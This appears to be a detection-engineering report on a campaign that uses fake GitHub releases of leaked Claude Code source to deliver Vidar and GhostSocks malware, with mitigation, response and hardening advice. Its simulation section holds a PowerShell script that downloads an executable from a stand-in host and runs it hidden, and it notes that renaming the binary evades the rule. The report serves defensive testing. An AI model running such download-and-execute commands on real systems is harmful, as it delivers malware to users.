SOC Prime Bias: Medium

08 Apr 2026 18:21

Claude Code Lures Turn GitHub Releases into a Malware Delivery Channel

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Threat actors rapidly capitalized on a misconfigured npm package that unintentionally exposed Anthropic’s Claude Code source. They spun up fake GitHub repositories hosting trojanized 7z “releases” that drop a Rust-built loader. Once executed, the dropper installs the Vidar infostealer alongside the GhostSocks SOCKS5 proxy to enable theft and covert access.

Investigation

The investigation uncovered a rotating-lure operation active since February 2026, relying on short-lived GitHub accounts to publish malicious release artifacts. Across the lure set, victims receive the same TradeAI.exe payload, which decrypts embedded C2 URLs, performs anti-analysis checks, and deploys both Vidar and GhostSocks. C2 discovery is handled through dead-drop resolvers hosted on Steam and Telegram, helping the campaign cycle infrastructure quickly.

Mitigation

Organizations should limit AI tool installs to vetted sources, block known malicious GitHub release links and related C2 domains, and watch closely for credential-theft behaviors. Add endpoint detections for Rust-compiled droppers and common Vidar/GhostSocks execution patterns. Strengthen coverage for sandbox-evasion signals and restrict suspicious script execution (including anomalous PowerShell activity) that may be used for staging or follow-on actions.

Response

If detected, isolate the endpoint, preserve the malicious executable and its associated 7z archive, and hunt for Vidar and GhostSocks artifacts across the host and network. Block the identified pastebin and snippet.host URLs and revoke any exposed credentials immediately. Perform a full credential-compromise assessment, then reset privileged accounts and invalidate tokens/sessions to prevent reuse.

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    The victim receives a phishing email (T1566.002) containing a malicious link that points to a compromised GitHub repository hosting TradeAI.exe. The victim clicks the link, which launches PowerShell in a hidden window. The script downloads the dropper to the temporary directory and executes it; the dropper then installs the Vidar stealer and GhostSocks proxy (T1027, T1090.003).

  • Regression Test Script:

      # -------------------------------------------------
      # Simulate execution of TradeAI.exe dropper
      # -------------------------------------------------
      # Placeholder URL: point this at a benign test binary in your lab
      $url = "http://malicious.example.com/TradeAI.exe"
      # Drop into %TEMP% (the path separator is required; without it
      # PowerShell reads $env:TEMPTradeAI as one undefined variable)
      $outPath = "$env:TEMP\TradeAI.exe"

      # Download the dropper (mimic real attacker behavior)
      Invoke-WebRequest -Uri $url -OutFile $outPath -UseBasicParsing

      # Execute the dropper silently
      Start-Process -FilePath $outPath -WindowStyle Hidden

      # OPTIONAL: wait a few seconds to allow any child processes to spawn
      Start-Sleep -Seconds 5
      # -------------------------------------------------

  • Cleanup Commands:

      # Remove the downloaded dropper and any temporary artifacts
      $outPath = "$env:TEMP\TradeAI.exe"
      if (Test-Path $outPath) { Remove-Item $outPath -Force }

      # (If the dropper created additional files, locate and delete them as needed)
      # Example: delete a known payload directory under %APPDATA%
      $payloadDir = "$env:APPDATA\Vidar"
      if (Test-Path $payloadDir) { Remove-Item $payloadDir -Recurse -Force }

Validation & Expected Outcome

  1. Expected SIEM Alert: After running the regression script, the SIEM should generate an alert where Image ends with TradeAI.exe (or ClaudeCode_x64.exe). The alert title will match the rule’s title field.
  2. Evasion Test: Rename the downloaded binary to TradeAI_renamed.exe and re‑run the script. No alert should fire, confirming the rule’s reliance on static filenames.

Hardening Recommendations

  1. Add Hash Indicators: Include SHA‑256 hashes of known malicious droppers in the rule (or a separate hash‑based rule).
  2. Broaden Scope: Extend detection to monitor for executions of unknown binaries launched from atypical locations (e.g., %TEMP%, %APPDATA%).
  3. Behavioral Correlation: Correlate the process creation with subsequent network connections to known GhostSocks C2 domains (T1090.003) and file writes of known Vidar components.
  4. Endpoint Enforcement: Deploy AppLocker or Windows Defender Application Control to block execution of unsigned binaries from user‑writable directories.

End of Report